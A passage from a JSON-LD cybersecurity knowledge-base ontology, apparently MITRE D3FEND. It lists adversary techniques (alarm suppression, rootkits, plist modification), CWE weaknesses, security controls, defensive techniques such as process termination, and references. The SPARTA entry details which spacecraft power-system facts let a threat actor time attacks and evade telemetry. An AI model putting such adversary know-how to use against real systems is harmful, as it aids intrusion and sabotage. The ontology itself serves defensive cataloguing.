      "d3f:definition": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.",
      "rdfs:label": "Alarm Suppression - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Alarm Suppression"
    },
    {
      "@id": "d3f:Reference-EvictionGuidanceforNetworksAffectedbytheSolarWindsandActiveDirectory/M365Compromise-CISA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisa.gov/news-events/analysis-reports/ar21-134a"
      },
      "d3f:kb-organization": "CISA",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "d3f:DNSCacheEviction"
        }
      ],
      "d3f:kb-reference-title": "Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise",
      "rdfs:label": "Reference - Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise - CISA"
    },
    {
      "@id": "d3f:Reference-CAR-2015-04-001%3ARemotelyScheduledTasksViaAT_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2015-04-001/"
      },
      "d3f:kb-abstract": "When AT.exe is used to remotely schedule tasks, Windows uses named pipes over SMB to communicate with the API on the remote machine. After authentication over SMB, the Named Pipe “ATSVC” is opened, over which the JobAdd function is called. On the remote host, the job files are created by the Task Scheduler and follow the convention C:\\Windows\\System32\\AT<job\\_id>. Unlike CAR-2013-05-004, this analytic specifically focuses on uses of AT that can be detected between hosts, indicating remotely gained execution.\n\nThis pipe activity could be discovered with a network decoder, such as that in wireshark, that can inspect SMB traffic to identify the use of pipes. It could also be detected by looking for raw packet capture streams or from a custom sensor on the host that hooks the appropriate API functions. If no network or API level of visibility is possible, this traffic may inferred by looking at SMB connections over 445/tcp followed by the creation of files matching the pattern C:\\Windows\\System32\\AT\\<job_id\\>.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2015-04-001: Remotely Scheduled Tasks via AT",
      "rdfs:label": "Reference - CAR-2015-04-001: Remotely Scheduled Tasks via AT - MITRE"
    },
    {
      "@id": "d3f:T0851",
      "@type": "owl:Class",
      "d3f:attack-id": "T0851",
      "d3f:definition": "Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. (Citation: Enterprise ATT&CK January 2018)",
      "rdfs:label": "Rootkit - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
        }
      ],
      "skos:prefLabel": "Rootkit"
    },
    {
      "@id": "d3f:ConfigurationDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ConfigurationDatabaseRecord"
      },
      "rdfs:label": "Configuration Database",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationResource"
        },
        {
          "@id": "_:Ndfb440c783ba42c18b00e6d671b5114c"
        }
      ]
    },
    {
      "@id": "_:Ndfb440c783ba42c18b00e6d671b5114c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:ImageSynthesisGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ISG",
      "d3f:definition": "Image synthesis thorugh the application of Generative Adversarial Networks.",
      "d3f:kb-article": "## References\n\nZhang, Q., Wang, H., Lu, H., Won, D., & Yoon, S. W. (2018). Medical Image Synthesis with Generative Adversarial Networks for Tissue Recognition. 2018 IEEE International Conference on Healthcare Informatics (ICHI), 199-207. doi: 10.1109/ICHI.2018.00030. [Link](https://ieeexplore.ieee.org/document/8419363)",
      "rdfs:label": "Image Synthesis GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:GenerativeAdversarialNetwork"
      }
    },
    {
      "@id": "d3f:T1647",
      "@type": "owl:Class",
      "d3f:attack-id": "T1647",
      "d3f:definition": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)",
      "rdfs:label": "Plist File Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:InferentialStatistics",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IS",
      "d3f:definition": "Statistical inference is the process of using data analysis to infer properties of an underlying distribution of probability.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Statistical inference. [Link](https://en.wikipedia.org/wiki/Statistical_inference)",
      "rdfs:label": "Inferential Statistics",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:CWE-207",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-207",
      "d3f:definition": "The product operates in an environment in which its existence or specific identity should not be known, but it behaves differently than other products with equivalent functionality, in a way that is observable to an attacker.",
      "rdfs:label": "Observable Behavioral Discrepancy With Equivalent Products",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-205"
      }
    },
    {
      "@id": "d3f:summarizes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x summarizes y: The sensor x summarizes a set y of events concerning digital artifacts over time.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02758570-v"
      },
      "rdfs:label": "summarizes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:VPNServer",
      "@type": "owl:Class",
      "d3f:definition": "A VPN server is a type of server that enables hosting and delivery of VPN services.\n\nIt is a combination of VPN hardware and software technologies that provides VPN clients with connectivity to a secure and/or private network, or rather, the VPN.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.techopedia.com/definition/30750/vpn-server"
      },
      "rdfs:label": "VPN Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Virtual_private_network"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:ProcessTermination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessTermination"
      ],
      "d3f:d3fend-id": "D3-PT",
      "d3f:definition": "Terminating a running application process on a computer system.",
      "d3f:kb-article": "## How it works\n\nProcesses are managed by the operating system kernel.  Different operating system kernels manage the creation and termination of processes in a different manner, and expose this functionality via the kernel API.\n\nA running process might be terminated to mitigate its immediate effects if it is exhibiting anomalous, unauthorized, or malicious behavior; such as after detecting anomalous behavior via <a href=\"https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis\" rdf:about=\"https://d3fend.mitre.org/ontologies/d3fend.owl#AdministrativeNetworkActivityAnalysis\">Administrative Network Activity Analysis</a>, after a failed check from <a href=\"https://d3fend.mitre.org/technique/d3f:StackFrameCanaryVerification\" rdf:about=\"https://d3fend.mitre.org/ontologies/d3fend.owl#StackFrameCanaryValidation\">Stack Frame Canary Validation</a>, or after <a href=\"https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis\" rdf:about=\"https://d3fend.mitre.org/ontologies/d3fend.owl#SystemCallAnalysis\">System Call Analysis</a> finds an attempt to execute an unauthorized system call.\n\n### Proprietary technology\nSecurity software might use proprietary technology to terminate processes, instead of the system-provided functions.    Further research may provide specific detail on such methods used.\n\n### System-provided functions\n\n#### Windows tools\nIn Windows, `ExitProcess()` is used to send a signal to a process to request it to exit, and `TerminateProcess()` is used to force a process to exit.\n\nThe `taskkill` executable available in the cmd shell is used to kill a process, with the `/F` switch forcing termination as with `TerminateProcess()`.  In PowerShell, `Stop-Process` is used, which is aliased by default to `spps` and `kill`.  Processes started in the Windows Subsystem for Linux (WSL) environment may be terminated there with the `kill` command.\n\nIn some cases, existing drivers can also be leveraged to kill processes.\n\n#### Unix/Linux tools\nIn Unix-like systems, all process termination requests are handled using signals.  The `kill` function takes the Process ID and signal to send, and is accessible with the `kill` command.  Some shells have a `kill` builtin function which is separate than the `kill` binary, which can also kill background jobs in the shell and additionally perform the function faster, and can run from an existing instance of the shell if the process table is full.  The signal SIGTERM specifies that the process to terminate may invoke a handler that it has defined instead of terminating, and the signal SIGKILL forces immediate termination.\n\nThe related command `xkill` terminates the connection of a program to the X window server, after which the user process may decide to terminate itself; however, termination is not guaranteed as the process, which could be on the same or different host, could then run in a terminal or reconnect to a different X server on any host.  Emacs is such a program that would not terminate itself after its connection to the X server is terminated.\n\n## Considerations\n\n### Persistence Mechanisms\nTerminating a malicious process is not enough to stop an adversary that has already gained persistence in the host via any initial access mechanism, including through that process or another access mechanism.\n\n### Terminating Multiple Processes\nOn most operating systems, process termination operations typically occur independently of each other, without functionality provided to atomically terminate multiple processes.  If there are multiple malicious processes which can make system calls to spawn other processes once one of them is closed, user session termination or system restart might be required.\n\n### Process Access Permissions\nUsers must have permissions to kill the process.  On Unix-like systems, either root or the process user can kill the process.  On Windows systems, process permissions are managed separately via process security tokens.\n\n### Process Resource Handles\n\n#### Terminating Processes with Open Resource Handles\n\nProcesses may have open resource handles, which could leave those resources in an undesired state if the process is forced to terminate.  As such, most operating systems provide a means to send a signal to a process to inform it to gracefully terminate, and on most of these operating systems, it is the typical first step used to terminate a process.\n\n#### Signal Traps\nAs the process may have open resource handles, commonly-used methods of process termination involve sending a signal to the process to terminate.\nOn Windows, the `ExitProcess()` function is used for this purpose.  Process instructions, as well as a third-party DLL can also cause the process to exit.\nOn Linux, the process is sent a signal on the occurrence of various events: when it loses the console, `SIGHUP`; when termination is requested, `SIGTERM`.  The processor then redirects execution to the function registered to handle the signal.\n\nTherefore, sending a signal to the process to ask it to terminate may not always work.\n\n##### Avoiding Signal Traps\n\nOn Unix-like systems, sending the `SIGKILL` signal for a process does not send a message to the process or invoke an implementation-defined handler; instead, it immediately does not allow the process to execute any further processor instructions.   On Windows `TerminateProcess()` instead of `ExitProcess()` performs the equivalent.\n\n#### Hang on System Call Execution\n\nEven still, as the operating system kernel manages the processes, kernel code may block process signals, including those which cannot be trapped, and does in certain circumstances.  Signals are blocked and queued for the duration of the system call when interrupting the system call would result in a kernel invariant being violated, such as when an action results in a malformed data structure; this blocking is common for filesystem requests.  Such system calls can hang when a filesystem has gone offline, leading to a long-term uninterruptible sleep, represented in POSIX command `ps` output as D state.\nAny malicious system calls or system call handlers are issues of a much larger problem (a kernel-level rootkit) and the system should be redeployed entirely or restored from a backup known to be prior to compromise, and other systems accessible directly and indirectly from that one should also be examined.\n\nA process that is truly hung in a system call may prevent the system from shutting down and leave it in an unresponsive state; a hard power off is required.\n\nTo speed up the action of terminating a process in uninterruptible sleep, the process resource accesses (handles) could be analyzed.\n\nOn Linux, [`sync` followed by `echo 3 > /proc/sys/vm/drop_caches`](https://www.kernel.org/doc/Documentation/sysctl/vm.txt) is a safe way to free up some inactive resource handles.\n\n\n#### Kernel Processes and Threads\nThe kernel may not allow kernel processes, which are created via methods other than user-space processes, to be terminated.\n\n#### Other Code using the Process\n\nTerminating a shared library can lead to unexpected errors; such shared libraries have their own mechanisms for termination.\n\nOn Windows, a DLL is unloaded when the reference count of the library reaches 0.\n\n#### Zombie process\n\nAfter a process has been terminated, it may still take up an entry in the operating system process table until another event occurs.\n\n##### Windows\nIn Windows, a process object is deleted when the last handle to the process is closed.\n\n##### Linux\nIn Linux, a process is removed from the process table when it is reaped by its parent process.  If the parent terminates, historically the parent has been changed to pid 1; however, in the Linux kernel 3.4 and above, processes can set a different process as the subreaper using the `prctl()` system call.\n\nZombie processes and hung processes could be resolved with a restart of the system.\n\n#### System restart\nFinally a system restart might be required to kill a process.\nSystems which are only accessible via a remote in-band connection may become inaccessible if a process termination operation that is necessary for reboot does not complete.\n\n### Subsystems\nProcesses that are started in a subsystem might not be fully terminated if they are terminated using the command for that subsystem.  For example, in the Windows Subsystem for Linux (WSL), processes started and terminated via WSL calls such as with the `kill` command in Bash may still have an entry in the Windows process table.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-InstantProcessTerminationToolToRecoverControlOfAnInformationHandlingSystem_DellProductsLP"
        },
        {
          "@id": "d3f:Reference-MalwareDetectionUsingLocalComputationalModels_CrowdstrikeInc"
        }
      ],
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Process Termination",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:N4a88f0bbb2e141689d18eb29ea6de914"
        }
      ]
    },
    {
      "@id": "_:N4a88f0bbb2e141689d18eb29ea6de914",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Privileged User Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "AC-2(7)"
    },
    {
      "@id": "d3f:Reference-FederalPublicKeyInfrastructure101",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.idmanagement.gov/university/fpki/"
      },
      "d3f:kb-author": "Identity, Credential, and Access Management Subcommittee (ICAMSC)",
      "d3f:kb-reference-of": {
        "@id": "d3f:Certificate-basedAuthentication"
      },
      "d3f:kb-reference-title": "Federal Public Key Infrastructure 101",
      "rdfs:label": "Reference - Federal Public Key Infrastructure 101"
    },
    {
      "@id": "d3f:Reference-MissionDependencyModelingForCyberSituationalAwareness",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csis.gmu.edu/noel/pubs/2016_NATO_IST_148.pdf"
      },
      "d3f:kb-abstract": "This paper describes a hierarchical graph-based model that captures mission dependencies at various levels of abstraction, showing interdependencies among mission objectives, tasks, information, and cyber assets. For this work, we employ established tools within a structured methodology for cyber resiliency analysis. Our model is focused on a strategic-level military scenario defined in a formal Request for Information (RFI) to industry and research partners by the NATO Multinational Cyber Defense Capability Development (MN CD2) Work Package 2 (WP2). We enhance this scenario with additional mission and operational context, and then build a mission dependency model for the enhanced scenario. It is anticipated that our mission dependency model will be part of an upcoming demonstration of cyber defense situational awareness capabilities in a NATO Communications and Information (NCI) Agency test environment, integrated with data sources that represent the operational military environment.",
      "d3f:kb-author": "William Heinbockel, Steven Noel, James Curbo",
      "d3f:kb-organization": "JHU APL",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Mission Dependency Modeling for Cyber Situational Awareness",
      "rdfs:label": "Reference - Mission Dependency Modeling for Cyber Situational Awareness"
    },
    {
      "@id": "d3f:CCI-002358_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements a reference monitor for organization-defined access control policies that is always invoked.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002358"
    },
    {
      "@id": "d3f:Reference-FWTKDocumentation-Fwtk.org",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.archive.org/web/20070510153306/http://www.fwtk.org/fwtk/docs/documentation.html#1.1"
      },
      "d3f:kb-abstract": "In case you don't already know, FWTK stands for the FireW all Tool Kit. It is used as a base to create a secure firewall system. If you need good documentation, please read the source code. If you are not familiar with C or do not feel comfortable with performing the configuration and security verification yourself, then I would suggest that you purchase a commercial firewall from a vendor (such as TIS, Checkpoint, Raptor, etc.).\n\nA machine needs other tools to secure it, including, but hardly limited to, tools to check files (tripwire), audit tools (tiger/cops), secure access methods (kerberos/ssh), something to watch logs and machine states (swatch/watcher some to mind) and filtering and routing tools such as screend/ipfilterd/ipacl.\n\nAgain, I would recommend that you do not proceed to build a production FWTK firewall unless you are familiar with UNIX security.",
      "d3f:kb-author": "fwtk.org",
      "d3f:kb-organization": "fwtk.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "FWTK Documentation",
      "rdfs:label": "Reference - FWTK Documentation - fwtk.org"
    },
    {
      "@id": "d3f:HardwareWatchdogTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A hardware watchdog timer is a watchdog timer implemented using electronic components.",
      "rdfs:label": "Hardware Watchdog Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareTimer"
        },
        {
          "@id": "d3f:WatchdogTimer"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4"
    },
    {
      "@id": "d3f:CWE-1037",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1037",
      "d3f:definition": "The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified.",
      "rdfs:label": "Processor Optimization Removal or Modification of Security-critical Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1038"
      }
    },
    {
      "@id": "d3f:OSAPIGetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that retrieves the execution context or state of a specific thread in a process.",
      "d3f:invokes": {
        "@id": "d3f:GetThreadContext"
      },
      "rdfs:label": "OS API Get Thread Context",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N158f2751912b483c862aa36195726619"
        }
      ]
    },
    {
      "@id": "_:N158f2751912b483c862aa36195726619",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetThreadContext"
      }
    },
    {
      "@id": "d3f:OTStopCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to stop a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Stop Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N7bb5b6aa5d414d6e81c0db5b7eae327a"
        }
      ]
    },
    {
      "@id": "_:N7bb5b6aa5d414d6e81c0db5b7eae327a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:LocalUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user account on a given host is a local user account for that specific host.",
      "rdfs:label": "Local User Account",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:JobFunctionAccessPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:JobFunctionAccessPatternAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Authorization"
      },
      "d3f:d3fend-id": "D3-JFAPA",
      "d3f:definition": "Detecting anomalies in user access patterns by comparing user access activity to behavioral profiles that categorize users by role such as job title, function, department.",
      "d3f:kb-article": "## How it works\nPeer group analysis identifies functionally similar groups of actors (users or resources) based on categorizations such as job title, organizational hierarchy, or other attribute that indicates similarity of job function. Current user access activity is then compared to the appropriate peer group behavior profile to identify anomalies.\n\n## Considerations\nPotential for false positives from anomalies that are not associated with malicious activity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AnomalyDetectionUsingAdaptiveBehavioralProfiles_SecuronixInc"
      },
      "rdfs:label": "Job Function Access Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N06fb7aec82fd4b6b9d9e0801fb661e63"
        }
      ]
    },
    {
      "@id": "_:N06fb7aec82fd4b6b9d9e0801fb661e63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:WindowsRegistryValueSetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where data is assigned to a registry value, either creating it or updating its existing content.",
      "rdfs:label": "Windows Registry Value Set Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WindowsRegistryValueEvent"
      }
    },
    {
      "@id": "d3f:date",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "A point or period of time associated with an event in the lifecycle of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:seeAlso": {
        "@id": "https://www.w3.org/wiki/Good_Ontologies#The_Dublin_Core_.28DC.29_ontology"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:REC-0001.08",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.08",
      "d3f:definition": "Reconnaissance of the electrical power system (EPS) focuses on generation, storage, distribution, and autonomy. Useful details include solar array topology and SADA behavior, MPPT algorithms, array string voltages, eclipse depth assumptions, battery chemistry and configuration, BMS charge/discharge limits and thermal dependencies, PCDU architecture, load-shed priorities, latching current limiters, and survival power rules. Artifacts surface in EPS ICDs, acceptance test data, TVAC power margin reports, anomaly response procedures, and vendor manuals. Correlating these with attitude plans and payload schedules lets a threat actor infer when state-of-charge runs tight, which loads are shed first, and how fast recovery proceeds after a brownout or safing entry. Knowledge of housekeeping telemetry formats and rate caps helps identify blind spots where abusive load patterns or command sequences may evade detection.",
      "rdfs:label": "Power - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/08/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Power"
    },
    {
      "@id": "d3f:SessionCookie",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A session cookie, also known as an in-memory cookie, transient cookie or non-persistent cookie, exists only in temporary memory while the user navigates the website. Web browsers normally delete session cookies when the user closes the browser. Unlike other cookies, session cookies do not have an expiration date assigned to them, which is how the browser knows to treat them as session cookies.",
      "rdfs:isDefinedBy": {
        "@id": "https://schema.ocsf.io/objects/http_cookie"
      },
      "rdfs:label": "Session Cookie",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:HTTP_cookie"
        },
        {
          "@id": "https://schema.ocsf.io/objects/http_cookie"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      },
      "skos:altLabel": [
        "In-memory Cookie",
        "Non-persistent Cookie",
        "Transient Cookie",
        "Web Session Cookie"
      ]
    },
    {
      "@id": "d3f:CWE-455",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-455",
      "d3f:definition": "The product does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error or a hardware security module (HSM) cannot be activated, which can cause the product to execute in a less secure fashion than intended by the administrator.",
      "rdfs:label": "Non-exit on Failed Initialization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-636"
        },
        {
          "@id": "d3f:CWE-665"
        },
        {
          "@id": "d3f:CWE-705"
        }
      ]
    },
    {
      "@id": "d3f:T1595",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595",
      "d3f:definition": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.",
      "rdfs:label": "Active Scanning",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001085_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system utilizes underlying hardware separation mechanisms to implement security function isolation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001085"
    },
    {
      "@id": "d3f:Reference-EmbeddingContextsForOn-lineThreatsIntoResponsePolicyZones-VerisignInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10440059B1"
      },
      "d3f:kb-abstract": "Hierarchical threat intelligence embedded in subdomain CNAMEs of a DNS denylist.\n\nIn one embodiment, a response policy zone (RPZ) application generates an RPZ that includes contexts for the on-line threats that are associated with domain names. For a domain name that is associated with an on-line threat, the RPZ application determines a threat specification that describes a characteristic of the on-line threat. The RPZ application then generates an alias based on the domain name and the threat specification. Subsequently, the RPZ application generates a domain name system (DNS) resource record that maps the domain name to the alias, includes the resource record in the RPZ, and transmits the RPZ to a DNS name server that implements the RPZ. Upon receiving a DNS query associated with the domain name, the DNS name server generates a DNS response based on the alias. Because the domain name and the threat specification is reflected in the alias, the DNS response automatically provides a relevant context.",
      "d3f:kb-author": "Ben McCarty",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-reference-of": {
        "@id": "d3f:HierarchicalDomainDenylisting"
      },
      "d3f:kb-reference-title": "Embedding contexts for on-line threats into response policy zones",
      "rdfs:label": "Reference - Embedding contexts for on-line threats into response policy zones - Verisign Inc"
    },
    {
      "@id": "d3f:HardwareDeviceConnectionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the physical or logical attachment of a device to a system, enabling its operational functionality.",
      "rdfs:label": "Hardware Device Connection Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceStateEvent"
      }
    },
    {
      "@id": "d3f:CredentialRevocation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialRevocation"
      ],
      "d3f:d3fend-id": "D3-CR",
      "d3f:definition": "Deleting a set of credentials permanently to prevent them from being used to authenticate.",
      "d3f:deletes": {
        "@id": "d3f:Credential"
      },
      "d3f:kb-article": "## How it works\n\nManagement servers with enterprise policies for account management provide the ability remove permissions, accounts, or credentials. Compromised credentials should be revoked to prevent further malicious activity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-RevokingaPreviouslyIssuedVerifiableCredential-Microsoft"
      },
      "rdfs:label": "Credential Revocation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "_:N41075e1b900945c4ac977d9f11a25312"
        }
      ]
    },
    {
      "@id": "_:N41075e1b900945c4ac977d9f11a25312",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T0844",
      "@type": "owl:Class",
      "d3f:attack-id": "T0844",
      "d3f:definition": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
